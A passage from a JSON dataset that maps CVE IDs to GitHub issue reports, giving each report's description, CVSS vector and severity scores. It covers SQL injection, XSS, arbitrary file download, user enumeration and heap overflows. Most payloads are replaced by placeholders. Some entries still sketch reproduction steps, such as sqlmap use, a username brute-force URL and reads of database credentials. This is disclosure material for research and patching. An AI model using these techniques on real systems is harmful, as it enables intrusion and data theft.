        "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44339",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/15",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/15",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-06-07T04:58:26Z",
        "description": "heap buffer overflow in function APITAG at APITAG . Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44342",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/19",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/19",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-06-07T05:05:25Z",
        "description": "heap buffer overflow in function APITAG at APITAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in function APITAG at APITAG Poc Poc file is FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44343",
        "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/18",
        "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/18",
        "Repo_new": "brackeen/ok-file-formats",
        "Issue_Created_At": "2021-06-07T05:04:12Z",
        "description": "heap buffer overflow in PATHTAG Version NUMBERTAG defd URLTAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command Compile test program: APITAG Compile test program with address sanitizer with this command: APITAG Result The result of running without ASAN: APITAG Information obtained by using ASAN: ERRORTAG Description A heap buffer overflow was discovered in ok_file_formats. The issue is being triggered in PATHTAG Poc Poc file is FILETAG .",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44347",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/7",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/7",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2021-11-28T13:01:01Z",
        "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //dump($_POST); //exit; APITAG //\u6570\u636e\u5e93\u8868\uff0c\u914d\u7f6e\u6587\u4ef6\u4e2d\u5b9a\u4e49\u4e86\u8868\u524d\u7f00\uff0c\u8fd9\u91cc\u5219\u4e0d\u9700\u8981\u5199 $id = APITAG //dump($id); //exit; if ($id==null){ $this >error('\u8bf7\u9009\u62e9\u5220\u9664\u9879\uff01'); } //\u5224\u65adid\u662f\u6570\u7ec4\u8fd8\u662f\u4e00\u4e2a\u6570\u503c if(is_array($id)){ $where = 'id APITAG APITAG \u51fd\u6570\u8fd4\u56de\u4e00\u4e2a\u7531\u6570\u7ec4\u5143\u7d20\u7ec4\u5408\u6210\u7684\u5b57\u7b26\u4e32 }else{ $where = APITAG } //dump($where); //exit; $count=$m >where($where) APITAG //\u4fee\u6539\u8868\u5355\u7528save\u51fd\u6570 if ($count NUMBERTAG this >success(\"\u6210\u529f\u5220\u9664{$count}\u6761\uff01\"); } else { $this >error('\u6279\u91cf\u5220\u9664\u5931\u8d25\uff01'); } } } This's APITAG POC: URLTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44348",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/9",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/9",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2021-11-28T13:04:16Z",
        "description": "PATHTAG PATHTAG line NUMBERTAG public function APITAG { //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") APITAG POC: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44349",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/8",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/8",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2021-11-28T13:02:52Z",
        "description": "PATHTAG has APITAG PATHTAG line NUMBERTAG public function APITAG //\u67e5\u8be2\u6307\u5b9aid\u7684\u680f\u76ee\u4fe1\u606f APITAG APITAG >where(\"id=$id\") >order('column_sort') APITAG POC: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44350",
        "Issue_Url_old": "https://github.com/top-think/framework/issues/2613",
        "Issue_Url_new": "https://github.com/top-think/framework/issues/2613",
        "Repo_new": "top-think/framework",
        "Issue_Created_At": "2021-11-29T01:27:44Z",
        "description": "SQL injection vulnerability. Version NUMBERTAG APITAG Finally, error injection is triggered\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44351",
        "Issue_Url_old": "https://github.com/NavigateCMS/Navigate-CMS/issues/28",
        "Issue_Url_new": "https://github.com/navigatecms/navigate-cms/issues/28",
        "Repo_new": "navigatecms/navigate-cms",
        "Issue_Created_At": "2021-11-25T14:27:44Z",
        "description": "arbitrary file read vulnerability. exp after login ,we can see our sid in cookies FILETAG for example my sid is APITAG then you can get arbitrary file by APITAG FILETAG APITAG you can get some Sensitive information such as mysql user/password analysis FILETAG FILETAG and in PATHTAG FILETAG we can rewrite bypass this filter. suggest you can use APITAG \"hacker\") rather than APITAG \"\")",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44550",
        "Issue_Url_old": "https://github.com/stanfordnlp/CoreNLP/issues/1222",
        "Issue_Url_new": "https://github.com/stanfordnlp/corenlp/issues/1222",
        "Repo_new": "stanfordnlp/corenlp",
        "Issue_Created_At": "2021-11-26T09:00:27Z",
        "description": "Header Manipulation. URLTAG We found 'classifier' may be contaminated on line NUMBERTAG of APITAG unvalidated data in an HTTP response header can enable cache poisoning, cross site scripting, cross user defacement, page hijacking, cookie manipulation or open redirect..It will affect on line NUMBERTAG of APITAG NUMBERTAG and NUMBERTAG have similar problems.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44554",
        "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/1",
        "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/1",
        "Repo_new": "cybelesoft/virtualui",
        "Issue_Created_At": "2021-11-29T09:16:36Z",
        "description": "Vulnerability User Enumeration Unauthenticated. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a vulnerability in Thinfinity APITAG that allows a malicious actor to enumerate users registered in the OS APITAG through APITAG How it works By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of APITAG Common users are administrator, admin, guest and krgtbt Payload The vulnerable vector is \" URLTAG \" where \"USERNAME\" need to be brute forced. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44568",
        "Issue_Url_old": "https://github.com/openSUSE/libsolv/issues/425",
        "Issue_Url_new": "https://github.com/opensuse/libsolv/issues/425",
        "Repo_new": "opensuse/libsolv",
        "Issue_Created_At": "2020-12-13T06:41:31Z",
        "description": "libsolv \u201cresolve_dependencies\u201d function two heap overflow vulnerability. Description: There is two heap overflow vulnerability in function: static int resolve_dependencies APITAG solv, int level, int disablerules, Queue dq) at src/solver.c: line NUMBERTAG line NUMBERTAG if (r >d NUMBERTAG solv >decisionmap r >p] APITAG decisionmap[p NUMBERTAG line NUMBERTAG The first bug is caused by the dangerous variable APITAG If the value of index \u201c r >p\u201d is bigger than the size of APITAG there will be a heap overflow bug. Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG Results differ: install k NUMBERTAG MENTIONTAG install k m NUMBERTAG MENTIONTAG test NUMBERTAG Results differ: +install c NUMBERTAG noarch MENTIONTAG install k m NUMBERTAG MENTIONTAG c NUMBERTAG noarch MENTIONTAG +install k m NUMBERTAG MENTIONTAG setsolverflags: unknown flag APITAG setsolverflags: unknown flag 'transaction' setsolverflags: unknown flag ' APITAG ' test NUMBERTAG Results differ: install A NUMBERTAG no +install k NUMBERTAG MENTIONTAG +install k m NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb info package c NUMBERTAG noarch conflicts with k NUMBERTAG provided by k NUMBERTAG problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG d4bc NUMBERTAG f allow k NUMBERTAG MENTIONTAG +problem ca NUMBERTAG eb solution NUMBERTAG deljob install name c testcase_read: cannot parse command 'solveflag>' setsolverflags: unknown flag 'yumobsol6eb' setsolverflags: unknown flag 'solution' setsolverflags: unknown flag NUMBERTAG setsolverflags: unknown flag 'deljob' setsolverflags: unknown flag 'install' setsolverflags: unknown flag 'name' setsolverflags: unknown flag 'c' str2job: bad line 'update A NUMBERTAG badarch APITAG testcase_read: cannot parse command 'nall' test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c0 at pc NUMBERTAG fab NUMBERTAG a NUMBERTAG a6c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c0 thread T NUMBERTAG fab NUMBERTAG a NUMBERTAG a6b in resolve_dependencies PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG fab NUMBERTAG a4d NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG c0 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG fab NUMBERTAG b NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG fab NUMBERTAG a0eb9a in solver_create PATHTAG NUMBERTAG fab NUMBERTAG fc NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG fab NUMBERTAG a NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c0c7fff NUMBERTAG e0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG f0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fa]fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd NUMBERTAG c0c7fff NUMBERTAG fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The second bug is same with the above heap overflow bug, which is caused by the dangerous variable APITAG The index \u201cp\u201d is dependent on variable \u201cdp\u201d, and variable \u201cdp\u201d is equal with pool >whatprovidesdata + r >d. If the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d, there will be a heap overflow vulnerability. Our APITAG file can make the value of index \u201cp\u201d is bigger than the size of \u201cdecisionmap\u201d. Please reproduce this issue through the following APITAG PATHTAG [resolve_dependencies NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: could not open PATHTAG test NUMBERTAG Transaction summary: str2job: unknown job 'noable NUMBERTAG testtags APITAG ' testcase_read: system: unknown repo 'system' testcase_read: could not open PATHTAG testcase_read: system: unknown repo 'system' str2job: bad line 'in' testcase_read: cannot parse command APITAG test NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b8 at pc NUMBERTAG f3afbc2eacd bp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG sp NUMBERTAG ffec NUMBERTAG f9f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b8 thread T NUMBERTAG f3afbc2eacc in resolve_dependencies PATHTAG NUMBERTAG f3afbc NUMBERTAG ba4 in solver_run_sat PATHTAG NUMBERTAG f3afbc NUMBERTAG a in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG b8 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f3afbd NUMBERTAG f NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f3afbc0ab9a in solver_create PATHTAG NUMBERTAG f3b NUMBERTAG c NUMBERTAG d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f3afac NUMBERTAG bf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in resolve_dependencies Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa]fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING The ASAN outputs information about these overflow bug. And attacker can use this bug to achieve a APITAG attack. Please reproduce and fix these two bugs.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44584",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/113",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/113",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2021-11-12T10:12:19Z",
        "description": "emlog pro NUMBERTAG has XSS Vulnerability. APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44585",
        "Issue_Url_old": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
        "Issue_Url_new": "https://github.com/jeecgboot/jeecg-boot/issues/3223",
        "Repo_new": "jeecgboot/jeecg-boot",
        "Issue_Created_At": "2021-11-30T09:33:40Z",
        "description": "\u53cd\u5c04\u578bXSS NUMBERTAG URLTAG \u622a\u56fe&\u4ee3\u7801\uff1a FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44586",
        "Issue_Url_old": "https://github.com/qinming99/dst-admin/issues/28",
        "Issue_Url_new": "https://github.com/qinming99/dst-admin/issues/28",
        "Repo_new": "qinming99/dst-admin",
        "Issue_Created_At": "2021-11-30T11:26:05Z",
        "description": "A security issue. Hi,guys! There is a serious security problem in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in unauth. That means I can download any file without authorization without using my account and password . Here is the example APITAG Target: URLTAG And the http data is: CODETAG poc: PATHTAG Remember to use burpsuite not browser Have a nice day!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44590",
        "Issue_Url_old": "https://github.com/libming/libming/issues/236",
        "Issue_Url_new": "https://github.com/libming/libming/issues/236",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2021-12-01T06:02:37Z",
        "description": "Memory allocation failure in cws2fws. version: master(commit NUMBERTAG aee NUMBERTAG command: listswf $FILE ERRORTAG A large integer passed to realloc, causing the allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44591",
        "Issue_Url_old": "https://github.com/libming/libming/issues/235",
        "Issue_Url_new": "https://github.com/libming/libming/issues/235",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2021-12-01T05:31:44Z",
        "description": "Memory allocation failure caused by the missing boundary check in APITAG version: master(commit NUMBERTAG aee NUMBERTAG URLTAG ) command: listswf $FILE ERRORTAG The cause of this bug is the lack of boundary checks. Specifically, in the APITAG function, the size of end and APITAG is not compared when APITAG is called. As a result, APITAG may be a negative integer, which eventually leads to allocation failure. The detailed call chain analysis is as follows. Download poc URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44608",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/12",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/12",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2021-12-01T15:46:38Z",
        "description": "APITAG Cross Site Scripting (XSS) APITAG I found two Authenticated Cross Site Scripting in 'file' parameter and 'type' parameter Cross Site Scripting in the parameter 'file' APITAG FILETAG Cross Site Scripting in the parameter 'type' APITAG FILETAG Impact The attacker can execute a HTML/JS Code the attacker can stealing cookies",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-44610",
        "Issue_Url_old": "https://github.com/alexlang24/bloofoxCMS/issues/13",
        "Issue_Url_new": "https://github.com/alexlang24/bloofoxcms/issues/13",
        "Repo_new": "alexlang24/bloofoxcms",
        "Issue_Created_At": "2021-12-02T13:03:52Z",
        "description": "Multiple SQL injection vulnerabilities . APITAG NUMBERTAG have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities URLTAG We can use sqlmap to validate\uff1a ERRORTAG FILETAG URLTAG CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44667",
        "Issue_Url_old": "https://github.com/alibaba/nacos/issues/7359",
        "Issue_Url_new": "https://github.com/alibaba/nacos/issues/7359",
        "Repo_new": "alibaba/nacos",
        "Issue_Created_At": "2021-12-04T19:23:34Z",
        "description": "This is a XSS vulnerabilities. Nacos has xss vulnerability Trigger condition: no verification required version: Nacos NUMBERTAG payload: APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44684",
        "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/5",
        "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/5",
        "Repo_new": "dwisiswant0/advisory",
        "Issue_Created_At": "2021-08-05T09:13:27Z",
        "description": "OS Command Injection in huntr ff NUMBERTAG b NUMBERTAG e NUMBERTAG c NUMBERTAG bf NUMBERTAG ec NUMBERTAG a NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44685",
        "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/3",
        "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/3",
        "Repo_new": "dwisiswant0/advisory",
        "Issue_Created_At": "2021-08-05T09:11:06Z",
        "description": "OS Command Injection in huntr NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44686",
        "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/18",
        "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/18",
        "Repo_new": "dwisiswant0/advisory",
        "Issue_Created_At": "2021-11-23T15:34:30Z",
        "description": "APITAG in launchpad NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44866",
        "Issue_Url_old": "https://github.com/projectworldsofficial/Online-Movie-Ticket-Booking-System-in-php/issues/6",
        "Issue_Url_new": "https://github.com/projectworldsofficial/online-movie-ticket-booking-system-in-php/issues/6",
        "Repo_new": "projectworldsofficial/online-movie-ticket-booking-system-in-php",
        "Issue_Created_At": "2021-12-06T08:59:58Z",
        "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Hey,I think there is a SQL Injection vulnerability in this system. The file FILETAG does not perform input validation on the 'id' paramter. So An attacker can append SQL queries to the input to extract sensitive information from the database. APITAG to the about page: Example: URLTAG APITAG the request to file. Example: GET APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Connection: close Cookie: APITAG Upgrade Insecure Requests NUMBERTAG APITAG APITAG on the file Example:sqlmap r FILETAG dbms=mysql threads NUMBERTAG APITAG sensitive information from the database FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44868",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/58",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/58",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2021-12-05T17:24:31Z",
        "description": "MCMS NUMBERTAG PATHTAG hava a SQL Injection Vulnerability. Vulnerability file: PATHTAG Vulnerability tracking path: CODETAG poc ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44892",
        "Issue_Url_old": "https://github.com/Stakcery/Web-Security/issues/1",
        "Issue_Url_new": "https://github.com/y4tacker/web-security/issues/1",
        "Repo_new": "y4tacker/web-security",
        "Issue_Created_At": "2021-12-07T13:08:51Z",
